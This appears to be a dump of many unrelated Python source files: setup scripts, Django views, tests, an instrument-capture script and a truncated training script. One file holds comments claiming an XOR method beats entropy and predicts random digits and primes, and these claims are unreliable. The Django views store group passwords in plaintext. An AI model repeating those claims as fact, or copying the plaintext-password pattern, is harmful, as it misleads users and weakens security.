content
stringlengths 5
1.05M
|
|---|
import setuptools
setuptools.setup(
name="parallel-execute",
version="0.1.0",
author="Sahil Pardeshi",
author_email="sahilrp7@gmail.com",
description="Python wrappers for easy multiprocessing and threading",
long_description=open('README.rst').read(),
url="https://github.com/parallel-execute/parallel-execute",
packages=setuptools.find_packages(),
license='MIT License',
classifiers=[
'Development Status :: 5 - Production/Stable',
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
"Operating System :: OS Independent",
]
)
|
#-------------------------------------------------------------------------------
# Get a screen catpure from DPO4000 series scope and save it to a file
# python 2.7 (http://www.python.org/)
# pyvisa 1.4 (http://pyvisa.sourceforge.net/)
# numpy 1.6.2 (http://numpy.scipy.org/)
# MatPlotLib 1.0.1 (http://matplotlib.sourceforge.net/)
#-------------------------------------------------------------------------------
import visa
import numpy as np
from struct import unpack
import pylab
scope = visa.instrument('USB0::0x0699::0x0401::No_Serial::INSTR')
scope.write('DATA:SOU CH1')
scope.write('DATA:WIDTH 1')
scope.write('DATA:ENC RPB')
ymult = float(scope.ask('WFMPRE:YMULT?'))
yzero = float(scope.ask('WFMPRE:YZERO?'))
yoff = float(scope.ask('WFMPRE:YOFF?'))
xincr = float(scope.ask('WFMPRE:XINCR?'))
scope.write('CURVE?')
data = scope.read_raw()
headerlen = 2 + int(data[1])
header = data[:headerlen]
ADC_wave = data[headerlen:-1]
ADC_wave = np.array(unpack('%sB' % len(ADC_wave),ADC_wave))
Volts = (ADC_wave - yoff) * ymult + yzero
Time = np.arange(0, xincr * len(Volts), xincr)
pylab.plot(Time, Volts)
pylab.show()
|
from .Stock import Stock
|
# xxPostxx
def Xploder(s):
if s==-1:
return 0
elif s==0:
return 1
elif s %2 == 0:
return ((s*2))+1
elif s==2:
return 2
else:
#for x in range(0,10):
temp = s+1
#print(s,temp)
s = temp * 2 -1
return s
def exploder(s):
if s % 2 == 0 and s != 2:
return s-1
elif s==2:
return 2
else:
#for x in range(0,10):
temp = s+1
#print(s,temp)
s = temp * 2 -1
return s
def getnexthex(hm):
a=0
f=''
hm = hex(hm)
hmlen = len(hm) -4
for x in range(0,hmlen):
f += 'f'
hm = int(hm,16) ^ int(str(hm[2] + f + 'e'),16)
return hm
def printssx(j, s,y, previ, h, ssx, number):
hy = h^y
hs = h^s
if hs == 0:
hs = h
hs1 = h^s+1
hssx1 = h^ssx+1
previh = previ^h
if previh == 0:
previh=h
sabsjyj= s^abs(j-(y^j))
ssxabsjyj = ssx^abs(j-(y^j))
if s^y==0:
syhsy= s,h^(s^y)
else:
syhsy= s^y,h^(s^y)
ssxyhsssxy = (exploder(ssx)^y),h^(ssx^y)
hyyy1y12y14= (h^y)^((y^y+1)+((y+1)*2)+((y+1)*4))
print(s,y, ssx, h, hy, hs, hs1,previh, sabsjyj, hssx1, ssxabsjyj, ssxyhsssxy, hyyy1y12y14, 1)
print(s,y, ssx, h, hy, hs, hs1,previh, sabsjyj, hssx1, ssxabsjyj, syhsy, hyyy1y12y14, 2)
print(s,y, exploder(exploder(ssx)), h, hy, hs, hs1,previh, sabsjyj^exploder(exploder(s)), hssx1^exploder(exploder(ssx)), ssxabsjyj^exploder(exploder(ssx)), ssxyhsssxy[0]^exploder(exploder(ssx)), ssxyhsssxy[1]^exploder(exploder(ssx)),hyyy1y12y14^exploder(exploder(h)), 3)
print(s,y, exploder(ssx), h, hy, hs, hs1,previh, sabsjyj^exploder(s), hssx1^exploder(h), ssxabsjyj^exploder(ssx), ssxyhsssxy[0]^exploder(ssx), ssxyhsssxy[1]^exploder(ssx),hyyy1y12y14^exploder(h), 4)
def getintandec(hm):
return hm, hex(hm)
# Firt random numbers of AMillionRandomDigits.bin : 1009732533765201
# We use getnexthex to generate 116167373077422, from 1009732533765201 and you will see that you get the answer
# in the form of 2019465067530403 which //2 is 1009732533765201
# The anomaly also works for just 1009. Try it, change j to j=getnexthex(1009)-1 and you will get the answer
# Also this will get you the next prime for 1009732533765201 which is 1009732533765251. Try it, the //2 answer is
# the prime. And guess what, we didn't start with that number, we get it from a number which is the getnexthex
# of the answer.
# Very cooly, there is a XOR relationship with the answers above and below the numbers in these columns. They are
# the powers of 2 numbers. You can verify by doing your xors in getintanddec(): like this:
# In [14]: getintandec(2019465067530503^232334746154744)
# Out[14]: (2251799813685247, '0x7ffffffffffff')
#
# I believe we can beat entropy, by discovering a hidden order between numbers that is unaccounted for. I believe a
# supercomputer can solve this, but we are humans, and if we put our minds to it, we can be the worlds first superintelligences
# Is there anyone willing to work with me for this monunmental acheivement? I have a version of this program that is so
# awesome, that i can get the next answer to every output, using a doubling of the previous result, getting all the way
# to the answer i want, except for one catch. sometimes, the results are negative. But i don't know how to account for that
# i just know that you can walk down the tree, each time, by just doubling the answer and using XOR and getting to the orignal # result from a getnexthex number of your result. That is impressive. What i am noticing is that negative seems to be occuring
# when the XOR chain converges on a powers of 2 number i.e. ( 2**50 ) and such.
#
# I do have some unnecessary prints, but this helps me when walking down the XOR chain. My end goal is to get the next value
# by just doubling a number, that gets the next result. I'm close. I just need help. Collobaration will get this done. Please
# collborate with me if you are impressed by this. Thanks.
# Try each of these j= results, by uncommenting the others and see you get the answer, in a semi walkdown XOR tree.
# No one can patent this method, i am open sourcing the use of using a XOR walk down tree.
# The 9th column is the cool one. Remember to use getintdec(result^previous) to see the walkdown from a powers of two number - # 1
# Sample output: column 9: 2019465067530503 which //2 is 1009732533765251 (next prime of 1009732533765201)
# Sample output column 9: 2019 which //2 is 1009 ( which is the first digits of AMillionRandomDigits, which is already prime)
# Sample output column 9: 2019465067530403 ( which //2 is 1009732533765201, the exact numbers of AMillionRandomDigits )
# Sample output column 9: getintanddec(2019465067530403^232334746154844) which is (2251799813685247, '0x7ffffffffffff') and
# is in the first column, because i iterate powers of 2 to get these results. Cool huh?
# Use ipython to run this, it's a quick way to run the program.
# Mark Nelson. I have learned so much about you Random number, i think i may know so much about it, that i can share info about
# it that would impress you. Even though i believe you created this challenge to prove entropy, i have immense appreciation for # for your random number, and i think i have in the past few years, learned and studied it so much that i think i'm on the
# verge of doing what frustrates mathemeticians, the ability to find a XOR path walking down a tree to get an answer just by # doubling
# a previous result for each iteration. I think you might appreciate this and that people are working hard on launching the new
# information age. You must know that one day a superintelligence will find this XOR tree. What not it be us? Humans, and not
# an AI.
def humansoversuperintelligence(j, y, s, ssx):
y=127 #127
s=127 # #1923
ssx=4
j=getnexthex(j)-1 # Which is 14. From 14 we get to 2019, which //2 is 1009. Cool huh?
#j=getnexthex(1009732533765251)-1 # Which is 116167373077372. and in 9th column is the answer if we div/2 Cool huh?
#j=getnexthex(1009732533765201)-1 # Which is 116167373077422. and in the 9th column is the answer if we div/2 Cool huh?
h=j
h=getnexthex(j)
previ=abs(j-(y^j))
breakit = 0
for x in range(0,200):
for xx in range(0,2):
if xx == 0:
printssx(j, s,y,previ,h, ssx, 1)
previ=h
h = abs(getnexthex(j) -(y^getnexthex(j)))
printssx(j, s,y,previ,h, ssx, 2)
y=Xploder(y) #y*2)+1
if xx == 1:
printssx(j, s,y,previ,h, ssx, 0)
previ=h
h = abs(getnexthex(j) -(s^getnexthex(j)))
printssx(j, s,y,previ,h, ssx, 4)
s=Xploder(s)
ssx=Xploder(ssx)
printssx(j, s,y,previ,h, ssx, 4)
if breakit == 1:
break
if len(str(h)) > len(str(j)):
breakit+=1
humansoversuperintelligence(1009, 127, 127, 4)
humansoversuperintelligence(1009732533765251, 127, 127, 4)
humansoversuperintelligence(1009732533765201, 127, 127, 4)
|
from django.shortcuts import render, redirect, reverse, get_object_or_404
from django.contrib import auth, messages
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import User
from .forms import CreateGroupForm, JoinGroupForm
from .models import Group
from profile_and_stats.models import UserProfileData, AttributeRating
from matches.models import MatchData
from django.utils import timezone
import datetime
# Create your views here.
@login_required
def group_select(request):
"""
Displays list of current users groups and option to create
or join new ones
"""
# Query to retrieve group information
my_profile = UserProfileData.objects.get(email=request.user.email)
my_groups = my_profile.my_group.all()
create_group_form = CreateGroupForm()
join_group_form = JoinGroupForm()
return render(request, 'group-select.html', {"create_group_form" : create_group_form, "join_group_form": join_group_form, "my_groups" : my_groups })
@login_required
def create_group(request):
user = User.objects.get(email=request.user.email)
users_profile_data = UserProfileData.objects.get(email=user.email)
if request.method == "POST":
# Create data for new group using request.post details
new_group_data = {}
new_group_data["password"] = request.POST["password"]
new_group_data["creator"] = users_profile_data.username
new_group_data["group_name"] = request.POST["group_name"]
# Feed data into model form and create Group if valid
create_group_form = CreateGroupForm(new_group_data)
if create_group_form.is_valid():
new_group_object = create_group_form.save()
# Add this user (the creator) to the group
new_group_object.users.add(users_profile_data)
new_group_object.save()
messages.success(request, "{} has been created as your new group!".format(request.POST["group_name"]))
return redirect(reverse('group-select'))
else:
join_group_form = JoinGroupForm()
return render(request, 'group-select.html', {"create_group_form": create_group_form, "reg_error":"yes-on-create", "join_group_form": join_group_form })
messages.error(request, "Sorry, you can't do that here!")
return redirect(reverse('group-select'))
@login_required
def group_home(request, id):
this_user = UserProfileData.objects.get(username=request.user.username)
try:
this_group = Group.objects.get(pk=id)
except Group.DoesNotExist:
messages.error(request, "Hmm, we can't find that group. Is that the correct ID?!")
return redirect(reverse('group-select'))
todays_date = datetime.datetime.now().date()
last_weeks_date = datetime.datetime.now().date() - timezone.timedelta(days=7)
groups_matches = MatchData.objects.filter(associated_group=this_group).filter(date_of_match__gte=last_weeks_date).reverse()[0:8]
players_i_have_rated = AttributeRating.objects.filter(rated_by=this_user)
# Ensure user is a member of the group top allow access
if str(this_user.email) in str(this_group.users.all()):
return render(request, 'group-home.html', {"group_data": this_group, "matches" : groups_matches, "players_i_have_rated" : players_i_have_rated, "this_user" : this_user })
else:
messages.error(request, "Sneeky, but you don't appear to be a member of the group you were trying to access! Join on this page if you have the access details...")
return redirect(reverse('group-select'))
@login_required
def join_group(request):
"""
Allows a user to join a new group
"""
if request.method == "POST":
# Check to see if the group ID exists...
try:
this_group = Group.objects.get(pk=request.POST["group_id"])
# If so, check to see if the group password is correct...
if this_group.password == request.POST["group_password"]:
this_user = UserProfileData.objects.get(username=request.user.username)
if str(this_user.email) in str(this_group.users.all()):
# Is the user already a member?
messages.error(request, "{0}, you are already a member of {1} you crazy cat!".format(this_user.username, this_group.group_name))
else:
# If not, add the user...
this_group.users.add(this_user)
this_group.save()
# Welcome the user and display their new group page...
messages.success(request, "Welcome to {0} {1}!!! Feel free to have a browse!".format(this_group.group_name, this_user.username))
return redirect('group-home', this_group.id)
else:
# If the group password is wrong return an error message...
messages.error(request, "The password you entered for the group is incorrect. Please try again or contact the groups administrator.")
return redirect(reverse('group-select'))
except:
messages.error(request, "Hmm, we can't find that group. Is that the correct ID?!")
return redirect(reverse('group-select'))
return redirect(reverse('group-select'))
|
import setuptools
with open("../README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="fuzzy-potato",
version='0.0.1',
author="Cezary Maszczyk",
author_email="cezary.maszczyk@gmail.com",
description="Library for string fuzzy matching",
long_description=long_description,
long_description_content_type="text/markdown",
url="h",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: GNU License",
],
python_requires='>=3.6',
)
|
import logging
import argparse
import os
import xml.etree.ElementTree as ET
import vision_genprog.tasks.image_processing as image_processing
import genprog.core as gpcore
import cv2
import ast
logging.basicConfig(level=logging.DEBUG, format='%(asctime)-15s %(message)s')
def main(
imageFilepath,
individualFilepath,
primitivesFilepath,
imageShapeHW,
outputDirectory
):
logging.info("test_image.main()")
if not os.path.exists(outputDirectory):
os.makedirs(outputDirectory)
# Create the interpreter
primitive_functions_tree = ET.parse(primitivesFilepath)
interpreter = image_processing.Interpreter(primitive_functions_tree, imageShapeHW)
# Load the individual
individual = gpcore.LoadIndividual(individualFilepath)
# Load the image
original_img = cv2.imread(imageFilepath, cv2.IMREAD_GRAYSCALE)
input_img = cv2.resize(original_img, dsize=(imageShapeHW[1], imageShapeHW[0]))
input_img_filepath = os.path.join(outputDirectory, "testImage_main_input.png")
cv2.imwrite(input_img_filepath, input_img)
output_heatmap = interpreter.Evaluate(
individual=individual,
variableNameToTypeDict={'image': 'grayscale_image'},
variableNameToValueDict={'image': input_img},
expectedReturnType='binary_image'
)
output_heatmap_filepath = os.path.join(outputDirectory, "testImage_main_heatmap.png")
cv2.imwrite(output_heatmap_filepath, output_heatmap)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('imageFilepath', help="The filepath to the image")
parser.add_argument('individualFilepath', help="The filepath to the individual to test")
parser.add_argument('--primitivesFilepath',
help="The filepath to the primitives xml file. Default: 'vision_genprog/tasks/image_processing.xml'",
default='vision_genprog/tasks/image_processing.xml')
parser.add_argument('--imageShapeHW', help="The image shape (height, width). Default='(256, 256)'",
default='(256, 256)')
parser.add_argument('--outputDirectory', help="The output directory. Default: './test_image_outputs'",
default='./test_image_outputs')
args = parser.parse_args()
imageShapeHW = ast.literal_eval(args.imageShapeHW)
main(
args.imageFilepath,
args.individualFilepath,
args.primitivesFilepath,
imageShapeHW,
args.outputDirectory
)
|
from tkinter import Variable
from typing import Callable
from flask import Flask
from flask.testing import FlaskClient
from strawberry.flask.views import GraphQLView
from strawberry import Schema
from src import APOLLO_PERSTISANCE_EXT_KEY
from .conftest import Query
from pytest_benchmark.fixture import BenchmarkFixture
import json
import src.flask.view
QUERY = """
query ($name: String!) {
hello(name: $name)
}
"""
VARS = json.dumps({"name": "bas"})
def test_no_persistance(benchmark: BenchmarkFixture):
app = Flask(__name__)
app.add_url_rule(
"/graphql",
view_func=GraphQLView.as_view(
"graphql_view",
schema=Schema(query=Query),
),
)
with app.test_client() as client:
def exec():
return client.get(
"/graphql",
content_type="application/json",
json={"query": QUERY, "variables": VARS},
)
result = benchmark(exec)
def test_persisted_not_in_cache(
client: FlaskClient,
benchmark: BenchmarkFixture,
str_to_sha256: Callable[[str], str],
mocker,
):
mocker.patch.object(src.flask.view, "cache", {})
hash = str_to_sha256(QUERY)
def exec():
data = {"version": 1, "sha256Hash": hash}
# Initial persist, query hash is now in cache
client.get(
"/graphql",
content_type="application/json",
query_string={
"extensions": json.dumps({APOLLO_PERSTISANCE_EXT_KEY: data}),
"variables": VARS,
},
)
return client.get(
"/graphql",
content_type="application/json",
query_string={
"query": QUERY,
"variables": VARS,
"extensions": json.dumps({APOLLO_PERSTISANCE_EXT_KEY: data}),
},
)
result = benchmark(exec)
assert result is not None
def test_persisted_cached(
client: FlaskClient,
benchmark: BenchmarkFixture,
str_to_sha256: Callable[[str], str],
mocker,
):
hash = str_to_sha256(QUERY)
mocker.patch.object(src.flask.view, "cache", {hash: QUERY})
def exec():
return client.get(
"/graphql",
content_type="application/json",
query_string={
"extensions": json.dumps(
{APOLLO_PERSTISANCE_EXT_KEY: {"version": 1, "sha256Hash": hash}}
),
"variables": VARS,
},
)
result = benchmark(exec)
assert result is not None
|
#!/usr/bin/env python
# Copyright (c) 2016 Hewlett Packard Enterprise Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import numpy as np
from sklearn import svm
from monasca_analytics.sml import svm_one_class
from test.util_for_testing import MonanasTestCase
logger = logging.getLogger(__name__)
class TestSvmOneClass(MonanasTestCase):
def setUp(self):
super(TestSvmOneClass, self).setUp()
self.svm = svm_one_class.SvmOneClass("fakeid", {
"module": "fake",
"nb_samples": 1000
})
def tearDown(self):
super(TestSvmOneClass, self).tearDown()
def get_testing_data(self):
a = np.random.uniform(size=1000)
b = np.random.uniform(size=1000)
c = np.random.uniform(size=1000)
d = np.random.uniform(size=1000)
return np.array([a, b, c, d]).T
def test_generate_train_test_sets(self):
data = self.get_testing_data()
train, test = self.svm._generate_train_test_sets(data, 0.6)
self.assertEqual(600, len(train))
self.assertEqual(400, len(test))
def test_learn_structure(self):
data = self.get_testing_data()
clf = self.svm.learn_structure(data)
self.assertIsInstance(clf, svm.OneClassSVM)
|
class Solution:
def numRescueBoats(self, people, limit):
"""
:type people: List[int]
:type limit: int
:rtype: int
"""
people.sort()
start, end = 0, len(people) - 1
total = 0
while start <= end:
total += 1
if people[start] + people[end] <= limit:
start += 1
end -= 1
return total
|
#!/usr/bin/env python3
import requests
import sys
import os
import typing
from bech32 import bech32_encode, bech32_decode
BECH32_PUBKEY_ACC_PREFIX = "bandpub"
BECH32_PUBKEY_VAL_PREFIX = "bandvaloperpub"
BECH32_PUBKEY_CONS_PREFIX = "bandvalconspub"
BECH32_ADDR_ACC_PREFIX = "band"
BECH32_ADDR_VAL_PREFIX = "bandvaloper"
BECH32_ADDR_CONS_PREFIX = "bandvalcons"
URL = "https://asia-southeast2-price-caching.cloudfunctions.net/query-price"
HEADERS = {"Content-Type": "application/json"}
def test_bech32():
testBechStr = "band1m5lq9u533qaya4q3nfyl6ulzqkpkhge9q8tpzs"
hrp, bz = bech32_decode(testBechStr)
assert hrp == BECH32_ADDR_ACC_PREFIX, "Invalid bech32 prefix"
assert bz is not None, "result should not be empty"
result = bech32_encode(BECH32_ADDR_VAL_PREFIX, bz)
assert result == "bandvaloper1m5lq9u533qaya4q3nfyl6ulzqkpkhge9v30z8m", "invalid encoding"
def main(symbols):
try:
payload = {"source": "cmc", "symbols": symbols}
# test bech32 usage
test_bech32()
pxs = requests.request("POST", URL, headers=HEADERS, json=payload).json()
if len(pxs) != len(symbols):
raise Exception("PXS_AND_SYMBOL_LEN_NOT_MATCH")
return ",".join(pxs)
except Exception as e:
print(e)
if __name__ == "__main__":
try:
print(main([*sys.argv[1:]]))
except Exception as e:
print(str(e), file=sys.stderr)
sys.exit(1)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-02-14 21:08
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('namubufferiapp', '0008_auto_20170211_2148'),
]
operations = [
migrations.AlterField(
model_name='account',
name='magic_token_ttl',
field=models.DateTimeField(default=datetime.datetime(2017, 2, 14, 21, 23, 7, 788486, tzinfo=utc)),
),
migrations.AlterField(
model_name='product',
name='price',
field=models.DecimalField(decimal_places=2, default=1, max_digits=5),
),
]
|
# python3
from gooey import *
import sys
from pyfaidx import Fasta
# input parameters
@Gooey(required_cols=4, program_name= 'split fasta into chunks optimized', header_bg_color= '#DCDCDC', terminal_font_color= '#DCDCDC', terminal_panel_color= '#DCDCDC')
def main():
ap = GooeyParser()
ap.add_argument("-in", "--input", required=True, widget='FileChooser', help="input single or multi-fasta file")
ap.add_argument("-out", "--output", required=True, widget='FileSaver', help="output multi-fasta file")
ap.add_argument("-step", "--step", required=True, type=int, help="step size for chunk creation, type = integer")
ap.add_argument("-win", "--window", required=True, type=int, help="window size for chunk creation, type = integer")
args = vars(ap.parse_args())
# main
# create function to split the input sequence based on a specific number of characters(60)
def split_every_60(s): return [str(s)[i:i+60] for i in range(0,len(str(s)),60)]
# create function to slice based on window and step
def slice_by_winstep(rec):
for i in range(0, features[rec][:].end - args['window'] + 1, args['step']):
print(''.join([">",rec,"_",str(i+1),"_",str(i + args['window'])]))
print('\n'.join(split_every_60(features[rec][i:i + args['window']].seq)))
return
# import multi or single-fasta file
features = Fasta(args['input'])
# iterate input headers to extract sequences and export as multi-fasta
sys.stdout = open(args['output'], 'a')
for key in features.keys():
slice_by_winstep(key)
sys.stdout.close()
if __name__ == '__main__':
main()
|
import pytest
from sr.tables import _cid, _concepts, _snomed
def test_cid_table():
"""Basic _cid table functionality tests."""
assert _cid.name_for_cid[2] == "AnatomicModifier"
assert "SCT" in _cid.cid_concepts[2]
assert "DCM" in _cid.cid_concepts[2]
def test_concepts_table():
"""Basic _concepts table functionality tests."""
assert isinstance(_concepts.concepts["SCT"], dict)
def test_snomed_table():
"""Basic _concepts table functionality tests."""
assert isinstance(_snomed.mapping["SCT"], dict)
assert isinstance(_snomed.mapping["SRT"], dict)
|
#!/home/jepoy/anaconda3/bin/python
import sys
import os
import random
import datetime
def main():
v = sys.version_info
print('Python version {}.{}.{}'.format(*v)) # note *v - returns a collection
v = sys.platform
print(v)
v = os.name
print(v)
v = os.getenv('PATH')
print(v)
v = os.getcwd() # Current Working Directory
print(v)
v = os.urandom(25) # btye object
print(v)
x = random.randint(1, 1000)
print(x)
x = list(range(25))
print(x)
random.shuffle(x)
print(x)
now = datetime.datetime.now()
print(now, now.year, now.month, now.day, now.hour, now.minute, now.second, now.microsecond)
if __name__ == '__main__': main()
|
def divisors(nb: int, extremum = False) -> list:
divisors = []
inf = 1 if extremum else 2
for i in range(inf, int(nb ** 0.5) + 1):
q, r = divmod(nb, i)
if r == 0:
if q >= i:
divisors.append(i)
if q > i:
divisors.append(nb // i)
return divisors
def d(nb: int) -> int:
return 1 + sum(divisors(nb))
if __name__ == "__main__":
resultat = 0
for a in range(1, 10000):
b = d(a)
if d(b) == a and a != b:
resultat += a
print(resultat)
|
from collections import OrderedDict
class CaseInsensitiveDict:
def __init__(self):
self.dict = OrderedDict()
def __repr__(self):
return str(list(self.dict.values()))
def __getitem__(self, key):
return self.dict[key.lower()][1]
def __setitem__(self, key, value):
self.dict[key.lower()] = (key, value)
def __contains__(self, key):
return key.lower() in self.dict
def get(self, key, default=None):
if key.lower() in self.dict:
return self.dict[key.lower()][1]
return default
def items(self):
return self.dict.values()
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.IEC61970.Dynamics.ExcitationSystems.ExcitationSystem import ExcitationSystem
class ExcST6B(ExcitationSystem):
"""IEEE (2005) ST6B Model The AVR consists of a PI voltage regulator with an inner loop field voltage regulator and pre-control. The field voltage regulator implements a proportional control. The pre-control and the delay in the feedback circuit increase the dynamic response.
"""
def __init__(self, tr=0.0, ilr=0.0, vrmin=0.0, vmult=0.0, vrmax=0.0, oelin=0.0, klr=0.0, kg=0.0, kpa=0.0, vamax=0.0, ts=0.0, kcl=0.0, tg=0.0, vamin=0.0, kia=0.0, kff=0.0, km=0.0, *args, **kw_args):
"""Initialises a new 'ExcST6B' instance.
@param tr: Filter time constant (>= 0.)
@param ilr: Field current limiter setpoint (> 0.)
@param vrmin: Minimum regulator output (< 0.)
@param vmult: If non-zero, multiply regulator output by terminal voltage
@param vrmax: Maximum regulator output (> 0.)
@param oelin: OEL input selector: 1 ? before UEL, 2 ? after UEL, 0 ? no OEL input
@param klr: Field current limiter gain (> 0.)
@param kg: Feedback gain (>= 0.)
@param kpa: Regulator proportional gain (> 0.)
@param vamax: PI maximum output. (> 0.)
@param ts: Rectifier firing time constant (not in IEEE model) (>= 0.)
@param kcl: Field current limiter conversion factor (> 0.)
@param tg: Feedback time constant (>= 0.)
@param vamin: PI minimum output (< 0.)
@param kia: Regulator integral gain (> 0.)
@param kff: Feedforward gain
@param km: Main gain
"""
#: Filter time constant (>= 0.)
self.tr = tr
#: Field current limiter setpoint (> 0.)
self.ilr = ilr
#: Minimum regulator output (< 0.)
self.vrmin = vrmin
#: If non-zero, multiply regulator output by terminal voltage
self.vmult = vmult
#: Maximum regulator output (> 0.)
self.vrmax = vrmax
#: OEL input selector: 1 ? before UEL, 2 ? after UEL, 0 ? no OEL input
self.oelin = oelin
#: Field current limiter gain (> 0.)
self.klr = klr
#: Feedback gain (>= 0.)
self.kg = kg
#: Regulator proportional gain (> 0.)
self.kpa = kpa
#: PI maximum output. (> 0.)
self.vamax = vamax
#: Rectifier firing time constant (not in IEEE model) (>= 0.)
self.ts = ts
#: Field current limiter conversion factor (> 0.)
self.kcl = kcl
#: Feedback time constant (>= 0.)
self.tg = tg
#: PI minimum output (< 0.)
self.vamin = vamin
#: Regulator integral gain (> 0.)
self.kia = kia
#: Feedforward gain
self.kff = kff
#: Main gain
self.km = km
super(ExcST6B, self).__init__(*args, **kw_args)
_attrs = ["tr", "ilr", "vrmin", "vmult", "vrmax", "oelin", "klr", "kg", "kpa", "vamax", "ts", "kcl", "tg", "vamin", "kia", "kff", "km"]
_attr_types = {"tr": float, "ilr": float, "vrmin": float, "vmult": float, "vrmax": float, "oelin": float, "klr": float, "kg": float, "kpa": float, "vamax": float, "ts": float, "kcl": float, "tg": float, "vamin": float, "kia": float, "kff": float, "km": float}
_defaults = {"tr": 0.0, "ilr": 0.0, "vrmin": 0.0, "vmult": 0.0, "vrmax": 0.0, "oelin": 0.0, "klr": 0.0, "kg": 0.0, "kpa": 0.0, "vamax": 0.0, "ts": 0.0, "kcl": 0.0, "tg": 0.0, "vamin": 0.0, "kia": 0.0, "kff": 0.0, "km": 0.0}
_enums = {}
_refs = []
_many_refs = []
|
# coding: utf-8
# Like v2, and in contrast to v1, this version removes the cumprod from the forward pass
# In addition, it uses a different conditional loss function compared to v2.
# Here, the loss is computed as the average loss of the total samples,
# instead of firstly averaging the cross entropy inside each task and then averaging over tasks equally.
# The weight of each task will be adjusted
# for the sample size used for training each task naturally without manually setting the weights.
# Imports
import os
import json
import pandas as pd
import time
import torch
import torch.nn as nn
import argparse
import sys
import numpy as np
from torch.utils.data import DataLoader
from torch.utils.data import SubsetRandomSampler
# ### from local .py files
sys.path.insert(0, "./helper_files") # to include ../layer.py etc.
from trainingeval import (iteration_logging, epoch_logging,
aftertraining_logging, save_predictions,
create_logfile)
from trainingeval import compute_per_class_mae, compute_selfentropy_for_mae
from resnet34 import BasicBlock
from dataset import levels_from_labelbatch
from losses import loss_conditional_v2
from helper import set_all_seeds, set_deterministic
from plotting import plot_training_loss, plot_mae, plot_accuracy
from plotting import plot_per_class_mae
from dataset import get_labels_from_loader
from parser import parse_cmdline_args
# Argparse helper
parser = argparse.ArgumentParser()
args = parse_cmdline_args(parser)
##########################
# Settings and Setup
##########################
NUM_WORKERS = args.numworkers
LEARNING_RATE = args.learningrate
NUM_EPOCHS = args.epochs
BATCH_SIZE = args.batchsize
SKIP_TRAIN_EVAL = args.skip_train_eval
SAVE_MODELS = args.save_models
if args.cuda >= 0 and torch.cuda.is_available():
DEVICE = torch.device(f'cuda:{args.cuda}')
else:
DEVICE = torch.device('cpu')
if args.seed == -1:
RANDOM_SEED = None
else:
RANDOM_SEED = args.seed
PATH = args.outpath
if not os.path.exists(PATH):
os.mkdir(PATH)
cuda_device = DEVICE
if torch.cuda.is_available():
cuda_version = torch.version.cuda
else:
cuda_version = 'NA'
info_dict = {
'settings': {
'script': os.path.basename(__file__),
'pytorch version': torch.__version__,
'cuda device': str(cuda_device),
'cuda version': cuda_version,
'random seed': RANDOM_SEED,
'learning rate': LEARNING_RATE,
'num epochs': NUM_EPOCHS,
'batch size': BATCH_SIZE,
'output path': PATH,
'training logfile': os.path.join(PATH, 'training.log')}
}
create_logfile(info_dict)
# Deterministic CUDA & cuDNN behavior and random seeds
#set_deterministic()
set_all_seeds(RANDOM_SEED)
###################
# Dataset
###################
if args.dataset == 'mnist':
from constants import MNIST_INFO as DATASET_INFO
from torchvision.datasets import MNIST as PyTorchDataset
from dataset import mnist_train_transform as train_transform
from dataset import mnist_validation_transform as validation_transform
elif args.dataset == 'morph2':
from constants import MORPH2_INFO as DATASET_INFO
from dataset import Morph2Dataset as PyTorchDataset
from dataset import morph2_train_transform as train_transform
from dataset import morph2_validation_transform as validation_transform
elif args.dataset == 'morph2-balanced':
from constants import MORPH2_BALANCED_INFO as DATASET_INFO
from dataset import Morph2Dataset as PyTorchDataset
from dataset import morph2_train_transform as train_transform
from dataset import morph2_validation_transform as validation_transform
else:
raise ValueError('Dataset choice not supported')
###################
# Dataset
###################
if args.dataset == 'mnist':
NUM_CLASSES = 10
GRAYSCALE = True
RESNET34_AVGPOOLSIZE = 1
train_dataset = PyTorchDataset(root='./datasets',
train=True,
download=True,
transform=train_transform())
valid_dataset = PyTorchDataset(root='./datasets',
train=True,
transform=validation_transform(),
download=False)
test_dataset = PyTorchDataset(root='./datasets',
train=False,
transform=validation_transform(),
download=False)
train_indices = torch.arange(1000, 60000)
valid_indices = torch.arange(0, 1000)
train_sampler = SubsetRandomSampler(train_indices)
valid_sampler = SubsetRandomSampler(valid_indices)
train_loader = DataLoader(dataset=train_dataset,
batch_size=BATCH_SIZE,
shuffle=False, # SubsetRandomSampler shuffles
drop_last=True,
